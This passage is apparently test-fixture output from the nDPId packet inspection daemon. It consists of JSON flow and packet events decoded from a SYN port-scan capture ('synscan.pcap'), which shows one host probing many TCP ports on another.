-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsTHsAACYG1fesEAAIQA2GNIzSACrdUoMYAAAAAGACDAAsZQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAscHUAADUGov2sEAAIQA2GNIzSySXdUoMYAAAAAGACCABnaQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsCSMAADAGD1CsEAAIQA2GNIzSIADdUoMYAAAAAGACBAAUjwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzsAACsGtjesEAAIQA2GNIzSBPfdUoMYAAAAAGACEAAjmAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs970AADoGFrWsEAAIQA2GNIzSPpDdUoMYAAAAAGACDADt\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs+JEAADEGHuGsEAAIQA2GNIzTGZPdU4MZAAAAAGACCAAW+QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs65oAACYGNtisEAAIQA2GNIzTCADdU4MZAAAAAGACDAAkjAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsOSQAACcG6E6sEAAIQA2GNIzTBAfdU4MZAAAAAGACEAAkhQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsMb0AADYG4LWsEAAIQA2GNIzTC9bdU4MZAAAAAGACDAAgtgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsLlAAAC0G7SKsEAAIQA2GNIzTH6PdU4MZAAAAAGACCAAQ6QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADEGCmWsEAAIQA2GNIzTH0LdU4MZAAAAAGACCAARSgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/csAACYGJKesEAAIQA2GNIzTBRXdU4MZAAAAAGACDAAndwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsp+IAACkGd5CsEAAIQA2GNIzTAu3dU4MZAAAAAGACCAAtnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs3QAAADsGMHKsEAAIQA2GNIzTI43dU4MZAAAAAGACEAAE\/wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsaMEAACoGtbGsEAAIQA2GNIzTFrLdU4MZAAAAAGACDAAV2gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsytsAADUGSJesEAAIQA2GNIzTF2\/dU4MZAAAAAGACCAAZHQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsCaYAACgGFs2sEAAIQA2GNIzTGnvdU4MZAAAAAGACBAAaEQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VgAADIGIRqsEAAIQA2GNIzTJxTdU4MZAAAAAGACDAAFeAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsmN8AADoGdZOsEAAIQA2GNIzTHcndU4MZAAAAAGACDAAOwwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAswcUAADIGVK2sEAAIQA2GNIzTD0HdU4MZAAAAAGACDAAdSwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsRaYAACsG18ysEAAIQA2GNIzSBDvdUoMYAAAAAGACEAAkVAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsiPMAACwGk3+sEAAIQA2GNIzSIf3dUoMYAAAAAGACBAASkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+0YAADcGFiysEAAIQA2GNIzSDT7dUoMYAAAAAGACEAAbUQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/f0AAC8GG3WsEAAIQA2GNIzSB1PdUoMYAAAAAGACEAAhPAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 